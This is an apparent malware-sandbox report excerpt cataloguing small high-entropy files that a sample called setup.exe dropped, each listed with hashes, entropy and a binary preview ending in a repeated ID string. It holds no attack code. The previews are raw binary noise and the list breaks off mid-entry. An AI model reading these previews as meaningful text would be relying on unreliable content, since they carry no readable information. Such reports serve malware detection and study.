              Preview:<?xml#...Q.Hn.+@h..MM....q.p......O.:Hin%.....^..c........_.o.Z',.W^u:.......j......S.Y..}MI..B..^s..4o$Bdc...J......5.fwM..-..}..~VL...0bJ.1.......*....v..j.y.a.\h.t..~..e...6.A....D4.V.@.].......G...|m.......yi..3...M........4..-R...T:...1...H..loX4....0.,=.R.[..e..0...:....Q.s..\+[Wg.f..yW..`G..P.b..L.f.....`/z..S.">.=1#....:WL......l..-...^}...bS-|.*.......c..U.....Z....tE.-.l..a.........\.G.H...-.=.i.8.R}.........9O.C.#*Ec...&.......E.f.k....:...i#..#..n.P........+..5.c.....b.PD..|.).mwA"A...flBreW.i..:....|.f\.#~.e....va{YQw.].C9.b...(.".&...C..`...t.O.,..$.....FV..*-....o}...OY.3cN=.........(..../luw.D^.;.\.V.s4.z./j.uk.N....2&...*g...b...~4........+.d7.m....>.n..N^.@.o.., hm.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1156
              Entropy (8bit):7.804046380806069
              Encrypted:false
              SSDEEP:24:v5e8zArZXhd6MH2Od8ZsRRIguGI8PGQtuXktlSs7zbD:vA8zArZXD6MWQ8CF2uftEsTD
              MD5:90B051FB4334B6AD5A7FED5F27512CF0
              SHA1:EA59E9C27B6F1BAA8C59A10FFE389BA70BF2DC5D
              SHA-256:504E6BC09B26546830194114B0F2D754E6C5287E6E603607BC6DBAF8E37AB684
              SHA-512:5830348508E244983AE1F02D229C2C5D23CA5526F3CF36AB70A07BAFBF11B03D60AE04965BB0556B3475D82719FB6D92410F579D6B7E39D616681C74DB133FCE
              Malicious:false
              Preview:<?xml..t.%...l.$...d....E/I.t%kmc.D.b..r..qj.N.....N.9s-....#.)...].!.S...m..7o...}.........z.%...>....\h^s.K.wW...w.o..A..2....6........}ocz...U-.8..?.c..y.....X(.v....ci..uT.......{.?.. A....4b.<.6....9.k8y.{.|]P.?.a.A.:v../d...G..>.E..-0..Y.e....&.{.=k.f.dh ..w.......5.)[w.e..F.[......~CE...n..I}E..-.t...|...br..(7$....Q..P...1..l..FSF`.;.zdah.....(.vP0..O.FC..?)...XIR=..K.x.....$t.`...XT.})Mf...v.#....TJH.@,v.I..u.G.+zX,...,.j..G~V.."....M....3..w......Y'..[.BIQ...6...J..}.0.m.......H.7....HU.,..dP...(k..H|..XE.YC..K.w.L.-.-P.d..?L@..@ F.%.7.1...jJr7.,.D.Jy^)..N90.....8.v9v.N..o.{.......c...Bs.....R.....t..Yn.@A.|?.|....k.R.o....[]....!..g!...Fl6..M....}r.al.k.8.{......s..F.... N"........p.....J.....Fw...@:..u..K!.P.1[M...d.O..c..3=e.'.^i..5...L..E.( .....c..'X..6.|.vR.6s....8..O^I3T..k..W$..G.@.;L...(DJ....".E.]..H._...f......k.~..v..M.......-.'....4...Z.pe.........x.z....`...?...l..."..{.h.O...V.+.6.N...L.t...qP..H.E..;.S.....w.pv..6J
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):927
              Entropy (8bit):7.793853600838658
              Encrypted:false
              SSDEEP:24:4GdaqVaT/noCwvISukSp6Iu/xOnMzZtfYq/GyYAbD:ddaqV5ZISukSxNGZJDGyYaD
              MD5:EE8450F8DB4578DA21070E2C988741B6
              SHA1:51C3DE19673217649F9711AF80E52DCCD9AC2FDB
              SHA-256:45624F7F4FA35001ECFB724CABACA1D01B6D791CC92589123BC0D9DB12BEBE65
              SHA-512:EF2AE4F4FCDCB1A857077DB0E82B612D7692F2A704607E050A80A116B2731B5F166F8DD5DB7E8E80449403C70E774C6B4E37CD81479CDC3D6FB30793906BFDE5
              Malicious:false
              Preview:<?xml....q.<1........OX..z.H."^K\.O}C...T...K.......{a.....!.V0#..=F.\b.Sq+&.3..#.......N5W...}....G."......4C.......J>..#.F.0S.-.>.\.....S......v..GY.\+.......to..1..............SW.l....9.0..k%...%,.B&,..n.AP..N...QO<.?<.f. r....no.B.#.......m..e.[..1.....%g...y ..h.}._.f......g?.....!.7.bW|.....;....X.....M.\..gw......c...|8.B..%....R..wP.j..|.....V.....F.GP._~Ec.r..i.zL@."'$9....$.~Dr..n.aI.>..A%.C.gXi.Zk.*.x.[..u.....\.!...=.C.Q...a9y....]7I...g5.wH....t..!..^.<IJ....\C.-{......H4.`yD...ro&...h.......Y.W......g..|;.CW..C1..t.".^.@.^n.2..../.op...7l..L.X..-........._..1..C}....S.S....F.9.....9'.....$.d...p.1.....,F...2K..AN...CDniS.p.%......V.8:...n.|0...>:<..&.5b.zo...$...nQ.gPUt\...?.9k.. r..#.qf.hs........0.L........Y...."...E..!(.&..J.t.{...2.~z.......D.W.....M..vvxb`..v.:t.......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):717
              Entropy (8bit):7.693451853986275
              Encrypted:false
              SSDEEP:12:KIOVeADrALk4irJsVcqkIlHU4hMNcR9fbcX6N5y+bau3xdctxBoHp8mcXQsMR2cq:zakk4itzPcRRbcqN3au3mxBtzpbD
              MD5:9FCE951DBD90B261BF401889E1ED3F8F
              SHA1:636CA504F6A5448B3793A5BE34806936ED864F4B
              SHA-256:1235645615961532A9136F0833F005AC65DF0C25C1F230DAFDABB3D1AA857C8F
              SHA-512:CA63BD896563D50BADA6E52C135ADC28EF2141E3FD6DB7B50F1BD8B8CDBA947EC16B39515C9D68B8475B6A820AF34ECB82FC20341E976A3E59E759F309E17D24
              Malicious:false
              Preview:<?xml..t..-..3o..f....5....t.F....4..%....y...B.:./....U\..jx.......K.eq.%_..N..<.Ne5.!.8?..)..C.....'..~...(N..u."..:......S....Ut^......N..p.....$...'...h.L..d.....@m.2.:T&g2..m..Pv.z..@..45#.-.S.|...m..q.Y.f.!P 9..Wj.%.X...}...t..{.{.z'D.C....L..!l../.....'.....T.S...%H...&[`.c{.6..l.CX.<.3:......".(...*.X.N...<...i..g.....-7.[K....7...R?.(....m....r........>p.)[T.>.B..\A.....f..7.U.....!.,j.m0..5..;........).q..c.eA7.m.Nf.ig?..d..w. C...4v.C......e@..Z..2@.$.x......%.P..X.q.v=..z'.3...#.V.....n......(6.^~...pS..2v.].|..M).x?b.....%.r..z~MZ9.hoM.l{Aj......B..+.H3....t/~^.m..1.;>O.8..."..A.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):942
              Entropy (8bit):7.775373106044076
              Encrypted:false
              SSDEEP:24:QXa/0/p/4BBQYyqS5qO0C+4cu6DCKqII7xAOLfIYdLJ8lF8bD:2Cm/4BBQ3qzC9cuS1EylMD
              MD5:A70A1813E501AC10196BADEFDEBAB64F
              SHA1:547E8CF580524023C572615B4F113BF40BB7363D
              SHA-256:3FF38D290F39D0CDE2417D77FF624B6034B6B510E900348CFB619FD1742D55A3
              SHA-512:D5D7BFCA9CF1821AD3534740CBE0828BCF7043AF0C85CFCD8B7F64C52CEA46B4DD775D8BB033B006086D11409CB570C996CFA7E955151DF0E45605ACC266FA1F
              Malicious:false
              Preview:<?xml2..$.f....v..R.bk..H..X.1.C._..b.'.......Bp?Q/s..B.eU...3..U(..C....b..*.}%..D..H.....ny..J.I.....Dkx...]....WdqP.].2.Z..zF........r.....u..P$..v.L...W.>...".=..!T.....1.q=..K.;.....{.'..l...Q.D..b...x_.WW..5.q...A.....C&..sL.0....3..\....=....B.x.. EU..GY...FQ......1.1.%\..V+/.d.t\.E.F......Uy...8.g.,...o...T.G2....|......0..8....kt .\v.K.eC...iD.f...p..............z ..'D.....L.P...IUC........nY.#.. ...g.l.?ru.z.~.]3.........9..^.........x_......I.2`...2@.%..B...H.mw.T._.x.E.G..P...M`).".I..w..H...)M....*.P>...h..8u.u.eq..5..E........z$..xL..X..8....L_cW.,.k.V?.........`....O..X../..M&..*..lF/.3{i.>`E..9..,.[..9.T hq@.].TDXZ3.....8r.;..3...Kt.f.c.'Z.\..'.K`..).e.z7..4.B........u..z.R.Q..k..RE......h..s[_.S....M.IqqU...K..rCZQ.P:..{2o.3..(.....1...6.(...~.8..0C.....#2 .......G|.J.w.59.....:K..1?.&...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):949
              Entropy (8bit):7.758135131566145
              Encrypted:false
              SSDEEP:24:WLvy8SJztYiNWbWDIVqSLGw3CZsUIItvb7R2obD:bz5NcXZGHzPD7oyD
              MD5:F896BCCD548B3FE87F183FB03E88B02E
              SHA1:AE9504A69A7658763B329388DAA3FC74C5A6F119
              SHA-256:53766B4A8D8AA6E6EB05F8748B12FA2CB5AC9ACCD20B61E312F05D4F6F79B902
              SHA-512:C914D48C160A1120C0F95507922350809521CF373266CD6C0F6FDE50A41B741110007C2DB124961A98C084EAA4F01E3DDD12572F59E08A19132A6A21F8957179
              Malicious:false
              Preview:<?xml..0<..&,X...*.^O...(...^Gae...B..4Xli.;6.t.....A../.3zg.ea...Uz....iB...p..BI....*#.......B..C.5.. +x...Pt.,...........e.s...V.~.c..(.........B/q$...$Pb...C9.eX.z.%.YsP..Z.s.oO....9P.]..$..GK.=+..O..b....;T.al...g......AYg.........K..gz.Gr...)Mmx...'...."5....2...8Q{....f........cO.M.'$.=Azr....I.d.......wI.X_.../......f$...).......O..q{.sk1...?A6....p.@..k...Z,..X.B.~.;....U.....i7.-..H..T...3".V.Jq....f.#.I9...},f.%.9.>.jz.....&s....]...A...7.W...oM..o._1=}....M....I..O..z...-s......c...w.L...,./....r{......'......N...I>..f....;.~>.........H..,..D.1T.......t.69..G....?Y.|F..r.R..Ut.l.s.F.....$....ft).|..6..@.k..-..cp.{.W:>..K.w..G>a^...f.#..B5........}......&+z.Si..X.....O?8.....<F...3.`.=..kG...L[.P.].U&(...5&.E~.pa&..y.i...m..X......gm..e..9..f...1Uj...o(.......].;lF.W.O..s...L...-./r.|...EV..}....H.+I.mVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):867
              Entropy (8bit):7.708922259810015
              Encrypted:false
              SSDEEP:24:7VD+riKxHoipx+RFYKeuDc27T50rHaguSbD:5+tDsReHe0rHaguAD
              MD5:6F356494252595DBB476F0DE15666A1C
              SHA1:891BDF32DD5A5B142AAF86447853A278096868EA
              SHA-256:41B1D860ED6D769973982D4562DFF6241A28BAD0BBC0FE810D12E5553A611628
              SHA-512:413C492F170A697E1AB5126ABD350F39CBD210BF23B113EDB18F9FFF6621907818FD8925FD56DD2A3972608A010A80A79400D697FA3A21367F21B07BF9D89883
              Malicious:false
              Preview:<?xml.n.@.Z.;I.}.w..x}Nj.|..O7}r9gs3.....8l........u...B..:}...9....FF. v.9d%..>......Na.R.......<9.I.O.=2xmE.$....+...^T.F.~....u...........`Nu.....v.9..~T...w.P.@S>.....}.>W...".7....[...-j.S^G..;.?.....`.....3I..n2..A.I|...=o;..[..+...}x..#.......|..r...0.b......V.%?{0Yn6.2.PAZ._M....I.Y..ku(p...Z.....G..gH".n*.....jJn.C.0.L".X...?...lb......n..V...oT..E9.....]\..j.....Za.K...^...."...4_\.~......%.%...R6..G...Nl.o[...p...a..^..^G.Bt...d.CE..i.......L.V=R.....Qns9..:g...].Q/..)hW9...).l9...[8.;..r.N...b.n..;..x.Q....i.=.bq...z.&x.IW....,...[.M.=$Q....xso..4A..+..-};s.y9.@...E..t^r.....(_x%Vt...2['.k.s#s....a.E....&P;.vd.lg.....Q6b...H1.S.].ke....O`.I22...TL.i.q.(...z\...D..)C.S....t......4.f..3.......Bh......g.X..Q[.D......G.HXx.T..j..}VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):918
              Entropy (8bit):7.750200204465425
              Encrypted:false
              SSDEEP:24:VPR3BMYX2Uth481B1L9nAobeCnssY7KBbD:V/DX2UT51LxAEssY7oD
              MD5:4FC47D25F334480FC92AB3B1ED16EC78
              SHA1:AF4791244692792021AB5C7BC20CDE66AFFDF8F3
              SHA-256:825DCD116FE752B529F5AE41E3106BB33CA79487ABBD9C40AC48DEF724C61856
              SHA-512:DB4AA25231959AC504527CDDF206A68964E388BFE1808149F2CC1B69423FE5D7A77754D2B5C78509C45A85FCFB52D9EB902BC8EBDA0258E08A32F873B43C1036
              Malicious:false
              Preview:<?xmlc...S`.l72._..@....>B;.P.u....z.......K.y.....S...M[B.2.9.s.9A.l.o=.n...r.9%B.nh......X9&.3..x..M......?..wf.j...:.v:.........X..?...y........N..R...qF?.\).!.l.U.O.T*VT..u....@...b....BS.....~..Fg.aG..%.z.4P.P.......HR1?D.M. g..=.64a7....W.R_.r........2..`..9.......~.FD7.{.0..4.D.B\~..n?B.{.[#b&....!./.z.(..N..g2..Y.L...'.Yp..]..9..."]...5.U/..~.......9..#...Q.c..>..|Q......YQ.G..d...g...XC.a.5u[...V.o..F.N.@>.m,}O...,....O...e......na1H....?O......z1.J.[?.jk.....2c.b.Ca4.....(.*...Z...0.@.b.1.<+.^...TOtr.5.....X.....2...0BW.7...k.;....5..dy.R.........rN.]l.s.......j.z....Q...aW..p...@.|..Z]6.']..2pU.....i^..E...W.O\.=`.gVr.~:W.0]Lq..c....y....[@.#.+b.|}...[_..:........(0Q<....9......cX.F..cT.k@.D.sb...0..........f..#,{..].(..z..W.].DL..b.<.... .qW...wW....>4.........J2..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):898
              Entropy (8bit):7.798064674912986
              Encrypted:false
              SSDEEP:24:1v4yslsHMqaU/y4jD1pxIUhAci1qICMvLoVQOhBibD:1vUlsHMqLy4jzxjGX86OcD
              MD5:8D0906A0DA1F368022E11E996636F302
              SHA1:F7669966CC94FDE4739A5FE0CE1876BB46B403A2
              SHA-256:702B773BCC318F2DF064133881D7564A591862342B7FE1B4D990999E4659B6AB
              SHA-512:A7CFB4555B845390002D7F3CA32BBE6E1D08B4A5BCEF0F68863648ACEAB7A73CA81A4282CF73E48275D593F4319759E43B672BEF5CFED3515BECA807ED6D4503
              Malicious:false
              Preview:<?xmlD.t.K...L.....y..E.G..u.._.-..h.O.#.B....U\Y..A.....q...G.&>:.!c..x..71.HC.D.s(a|.7oFL...)[>..?u.U*QR....o.....5'?{{.b...")X.U.\..xet..uu.j..\'.Gks..!e0.N...Z.D[....$.'......l..3nw........_......../%.4.OK.@..@)W...Iu.u..7......A2@4.V.Wx.....d..G..h.1.z]..~{..L.$.c....|'.N...O+..]{.)....p.=.lNx .....~.U........p....V.A<iz.)...q..L....-.;L..sF.Gd....'.oPJC..l.lL...[...9.o....._|.....j...../.m...fn....b..k*.b(.#.8u...1.,.Ug}...f$k.D...o.U..[(K#e.q.O.............._......=...@.....c.g.L..si.........t...".^.z....g;.. ..P.:.;..+1..'G.u.4.....2c%.g.X.Gy.k.O....h&j.m.j.....6..{.E...iJ.Vc-..qm....#.[!...OU...S..sg.~..1..[....+..F!c(~"..`.-)..q....k..N:...B".A......>;.%J..a.$..{. ...~j...V..~...@.C[.j.E5..V.gIyu3.._m.he..A..O....?...A.i.?...8.o......`...<...[$..i;...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):798
              Entropy (8bit):7.708716294635138
              Encrypted:false
              SSDEEP:24:Y3amqvlVVStrTqv0c9DP/oty+kzV1FGuXtkfAqPyepbD:Y0SseyXVmuXsAqaeJD
              MD5:C72C662060C050A137EF557C85F40308
              SHA1:F94A6061BA512271E71E51F4F60943D26427EB9E
              SHA-256:C19911E0F4361E41D45E1A166C5777ECDC0942993401CB1A13D621524B6D3981
              SHA-512:1DEFD41AEE0BD309A587199A2F4A3C2AC95E13671D35D13F3125ACE4EFF3D45DFCF808AE337B4C029947977DA576BB6D9775C593D0E709063AC84307EF997C8D
              Malicious:false
              Preview:<?xml:.4.HH..L.c..p.....(..R,......c(.0..Kb.s\.DfRc...j........6...........B....;5f..h..+.......X.X..U.&...eS.b.96.*u...o.Q.._N....@g..iN.Ky20Go..u+#...."X..(.uB.. .4..i..\_..z.....9u..'..j..i..x.#..l..C>....}w,guY[4..H.]j.bx5K".j.t.).."7.+...kZ........z^..K..".y+......*....B..i...s-.b....e../{..u...c.....a..:cN..T.~ESAj..).,PL...5..r~...)...:....(.Nv...).H....a.PG..J...(.d...}.j.l-...@.d.i.mIxZ.*U.I^mL..2........H.[XZ..f.B........ ....).^..........1....F[B.)l....$/....C.w..%J..i.0.......<...........v.K._....h'..d4.D..W.l.J?.>.......M^^v...$..5f.0....8-.......>....Mvl.U.j.G..K..]...*dh.r..N.iIT.AkX.,."0.d{!.zC.S..Nk..+..\d[x...t... ...".t..$..`.....P_w...56.....ku.....Z\.I._...1VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):788
              Entropy (8bit):7.711487119987679
              Encrypted:false
              SSDEEP:24:Ov75ublCok3DdGwCj1gXPvZN2gcw4FpbD:CulTk3DdGk50gH4FJD
              MD5:455857C33599C9EFA4BF6BC2772A7B03
              SHA1:18C46D69FB47099C452ECAEEE0FD0104F8B5286E
              SHA-256:76ED337B039593605A263C871BECFE31C6BED1728C9D2ABB2BB347D09F5AD7E3
              SHA-512:9045BFF901C4A433F366928A362F4D25DCA3E713FB37415E848F4E3B311F29FE819A9DFBB12D74CC84F840C4F21DC661F4B9AC721AECF9CE72A55C852387656A
              Malicious:false
              Preview:<?xmljK....#....4P-`...5.gL}~..7....mD..t....qQ.l[......a!>Q.)..i..ap$.9....o.KO.@..e8~?n.T.E.`..>._...B..Z......r.g.4z.8".:.^vw.......e..jf...Q...x..C./dI.M....s+..H.C..>..B....j.....R!....D|.$.\......ANC..e..!..fN..5m..<..&.UZ.+.G...j.QJ...]...*..-$.t...hb......W..%..vX.......m.U.y.:....RT5e....v....}..B.'P......U.v~..<...kh.%.2..(...";..?7.C.Q..w.r9...e_!./>..y.Y^A.<.....+'..3UG....m..>..G<|..p...Z..|.+~......4.m.........3.....NP...v....1.?..&..!.m.j".&..[%A_..$h.L..).^...s..v..........r....&..'.cc...uK.Y%|'...*{.WW_.U..E}.u%u...Z ....%.w..[....HW))zk.......Y'......w.....k.i...s.8....N..Rq!.M.9...*....Pb..~O....c.^..S6.@...Gt..9D..v...x._.6.P}.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):987
              Entropy (8bit):7.7989348728884575
              Encrypted:false
              SSDEEP:24:rMbhvkyW4bSfkYrTZmOyi2aSNSeTUtRYFlW8MizrsnYbD:wFh1CyilZ9o6nCD
              MD5:FF42D0526C2D9DEDB60B16A13014DB9B
              SHA1:81DD47F98BA4EDEA2B67C2B370F151E6B7861446
              SHA-256:19F26CB5DC3B424971F224449BB9181B4E9F7E9DEEA849E5372BB10E70936386
              SHA-512:FAC437B0B447B9497F0DFE7F0427D2C0B5468EE1885C7FA1990950AFADDF1F1FDF5240A274772621A0F8B4AB47F9AB22848EEF997A5EBAB4CE56B733BEE3134E
              Malicious:false
              Preview:<?xml.2..5...~...IQ.K(..... .....ao.....i...U=|Qa.q*....H..N.S7Q..F.l.....s...../...1.]lg.m..DU..A...d.5...&Z....Ok.. .SV..g.........a{...-.@....</..*y.9.A.....8$.!....e.c.;...Ki^CU.Ws.h ..3.9).5..i}.>7..&..w.a.7.Vz;.u...k..\..e.......{.d....Y$.T.......)k......j"..`S...m....!y.t..q/H..|Aw.....b.!..*._m.....s......&..........7...._...(5.....".....?.L..`..J....w..f'F}...Gx.Bna...5........>i-...$..mkk..JG|l..zeq.b)..oZ.g....._..........w....g...&;I...<.:...h(u{..F..k.7.Q......SY.\i.....}.&P.9.n....2...@\...}..g..O.....B.:q&........".~...E4.i.....l.q.k...@.4Nh..T.....Z......^.8.Y.n..V.w.9;f..od6..-.....B.(s....K..6....zm......h+G...N.3..WR.w^2...&...[2v....rLp...P....}0y/uQl.1.....!U#/.Nr.`..A....TI~.%.....Z..P.x..h......X...l.Y.[.>...../.....m]".R.AU..._8M .U....\.*....*.....T....6..E..D7$..-.e.@7Q.7Q.Y....M.\.5.<...:l......4...O.R?...p....&...%..w.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):996
              Entropy (8bit):7.80781506780924
              Encrypted:false
              SSDEEP:24:AKaZBAeaFChfzy0Y/bQjuHy2X2WEfUp8sEE11acZbD:AKaKCJYMS59xhEE1/D
              MD5:0040EB95DEC143B3E69FF3E509509CBC
              SHA1:AA2FD5121609A16CB1A8784535C4BE63EC24D801
              SHA-256:38D7EA1C038B7358A7795A9C0065A4B4CFA0C08CAF36D2EDA023B3FFA0AB67F2
              SHA-512:BE69B3D3A291DA4E5A5C07AED89DE21B31F6B39A9BB587095B6A8E0D9D516753BE4CB97F6BA7616BFA7C0B88FAF9F77926620920A7D7E4AEF7E5BD71EFB4B838
              Malicious:false
              Preview:<?xml..AF.".C.0...}j.rC.B....J!.lN.=02-........#..p.<.>.l.|..Y.*..*.oo..v....>0k>`ZN.........9....\.."...?......{..e.p3....M..a.c_F.}JP3.Y-i..\..R>.._Y.....}a..j4. ......>=.<....U.Kv....X.s..<._J.O...y...)..O.g....d.....M.ELRB7.hOcd..^.y..'.e.%....i.+.W..4...|n.....a....8#.K...L7!.........(e.`..F......'....o;d..../........a..'C.R..r...dY{.Cj..e..-dy.....kx.......%..]f%..?.."...NU8..x..........H).....NvMe.i.O.s8.Z.s7kVfP..J...A.m.dh.u.p.U.q..C. :....q!F..*_..j../.h.\V.9...#."....U+<l...Q.hVQ.k.8.9..9....U..... ..0...\...m......=.U...F...n...........F....;u..~|zg... ..E.z..r.u....f...Q....1]..-5.....;.X..-.[k ...A..&..\.@...jg.'..q.:.....z$=...G....96.g5.o...8PN.Hc4..P.s...!.g.E).^.h..?.^..7...Wu..h0l..=. .Z.......s.Q".;r..b.......rz....c.....K...e......6........Y..%.Y...x...Q.6..O..Ax&..]..C8T..z..4......VqY..{qyf..X...KT..:.#...t.Q..-.8-..?+b..y...2..V..M..&VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):893
              Entropy (8bit):7.762839040000491
              Encrypted:false
              SSDEEP:12:y4RTpi+KA3GJSHH8+ox75ikmejOxQ5uy2hM7pki5XDUnGW/wubFwmJ8MwOQcyzJu:pRTMUjHH8nF5jx9kWhw31HJUOQcbbD
              MD5:04D6A62206B71148DD00AF72D730152F
              SHA1:601E1AD2608B9A4912C9E29CBB46FC8EF1971210
              SHA-256:2B33438214CA18D59D54A82CA441F7A048351A3CDCF8BBDEAB02171381A8A77F
              SHA-512:9E42E2D3D20C7A5DD4E568FD36C18134A5074B37680762DC1A80B2CFC500B140FF2890A4F75549D95477A260191162DBFB948B22A2FDB70A3F04EC941D895CD4
              Malicious:false
              Preview:<?xml..e,...M.......+bo<a......L..q...H0.......).>......w..G.u......="..;.U........0......0..qk.cK..K.f.0p.o..d9..j.......v.q+.;.>I.DEOe..X.q.C...:...6...0].....Y..1OP........x........P..z.q.........L.1".....k..".......d...P)..{..2..\......<.../..+a..3.(..O.!.q.}_o.EF.d|>NQO:.G.$+Y..%...m.m.u].}...*.;Q.!P..8..p5....G..KU..Hg.z.v..3.I...J.M.+.KY.>...Z.=".$.f.R.3..iC.sX.(..h.J...K...b.R^....IO.?t...No...8.K.n..S .*9j..{.{..........`.. iuEC_Z^n..|....y.[p..>.....3...5..2.GIw.........x#..[g0.i..l.b5..C...9x......2.....W..3.2....DB.f5.`L.@...6s.}.l.".D.. ...0`4.....U...~....r....1"..D.....{.....k.....Y.....^..n.v.*%....:.$.A%!...H.S,.0.?1..}.....]..&.........GK...T....j.2.!02......Q.Pd...NY[.+.......)....}`.5.."S'*.......e..+..|..P...@i.-.....@C..s..c.U.S..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):799
              Entropy (8bit):7.748067885293522
              Encrypted:false
              SSDEEP:12:uQSyKDjDghtSY+AEVBVhfm8Uv4wVIwtBDHTS3R5xAhHiXtxYzRSOmjxBEsrtsMRw:vSyc/s+HVBf2v4cvAEwtyNSOdsrKbD
              MD5:DFF062B6F554444BD5C61524E881FF12
              SHA1:2BD00E5BB98C9F76641A03FDCC7A7B71F05DAE86
              SHA-256:7276ED9CBA5AB9FAC3603D0FFCE813B1762FFD9EDAE1DAD8D899E0AFFE17921F
              SHA-512:2B144644E95C86ADF9FA5E1A7FDAC9C2878628DD2F32C4D1A12AA6061406E395E101BED1295FCC986CAE647262EE0EB07BC92DB82872757CB80346A328BFA9DC
              Malicious:false
              Preview:<?xml|l _.:..j.`.......n.U2.c.. ......>.gA.......x..3}..O3..H.. .w.#.BK........p....(:.....`BI...1........mi.Uz........T.M...]...~U.]..Tf........Y.}..........WX.+#t....,t....l..;%.......|....'h.../Z..Req..K) ...R.f.z)..t..#.OG;S ............#..Q.."....<d..wp.*)m.zX\.i.Y..@.<......*.?i..7.j........AAuJ~,u....##?"..YR...5....x.z..z...{..=v......"._.<.gg..|..25..o.C^.dm...UW.1lQ..Yh'..|.M..|)..t.9...g._/.....D...N.K..H.E..{4ERN....j.6.w~....N....t..H.0............i..}Np,R......W.W0......{.su.u~.|............a...#..-...TLo6g......BS.{...+-.y{...............Z....P..c...eJ.0.WbFQD..0A]...ws.I.V91>b_....A.p..w.W<....&. ......}......W':..|06>.O.._+.r.._.......QI.]...v.....o.aA.[(......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.705048581959662
              Encrypted:false
              SSDEEP:12:WlCMifcObQdyEsDts9vt8+lR4zCyhV/zbhNhOA3qwrTcy6hJEPZ4IfOqCzsMR2cq:WXqDtsc+lwNdXhNhOgXv6hWPZYqCYbD
              MD5:C9383E838DE4D0E260BE8BA32B2FAF6A
              SHA1:798557B81DD530A4F4900A22AF1D727F99235468
              SHA-256:B76308D341F91E50499A1D2D4B82D367BABDCF296820EE3614C0606D400DEA63
              SHA-512:9C330D67A920B2E59123A1778B98BB407DCE2DE71973D7F04663E8B9AD4501F73F0E4A88237D2DFE388D8094C1EE1529862305F1735ABA7C546CD66C30787E6E
              Malicious:false
              Preview:<?xml..6k.......X .}.[I...~...SD.N.].A......4 c.g..E'...3.X&1..w.....W..T. T..2.j.rD..A.....}.=|n..8 l"C.........i..=4f.%...S...n.0~...-qj...1...n.6.H....O.Q...}@...o...Z....7......l.ct..iw...H..xy...1.M..`.v....aov.*S.Mp.)..1LC.KW.w....I..7D6?.._......N.f...O.^Yl.5.b.5...*^ps..)..V.....pG..]8....=..}.0.eS.Zx...d..^.......6..."..x{..LNy.T..C..A>..B.V..N....[.R.LF[$S@~o....Nn.....U1.{...8.@.L.,.~mr.,5..........f.H.b..np.E..pz..=.].;.w 3..U....:R:...$...U.J"..W......B5.'...(s.C...0.....w..a.eE.JZ......_...Z..*.N..z..H.6;._aI..8..d.T......T....7i.;y.....+.....x.O.A.&......`...b4{@iKNuq.0..z.........9..oP.&...*?..e..B......b.4".&.z......$_.*.,.m^.W.m.^...0...!...S...>........B...E..@.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.747200782964812
              Encrypted:false
              SSDEEP:12:lR+IN2K50QEXxyCyahjCQ/6Tgh3f4zYlWkOkILMvBBPABz5R25jj0AoU9D7asMRw:lRTNV50QuyCbX/6Te5Cz5RcPLfbD
              MD5:D00F2E55184595C3BF5C8E7CCCC66946
              SHA1:6AA246D7BE3871E20A3D0FC75F6D57BEA2202D44
              SHA-256:C54A257CF32FEBC2B69B3AF5EA5A6E1B4951564360674B4DA29356C2EB9D0877
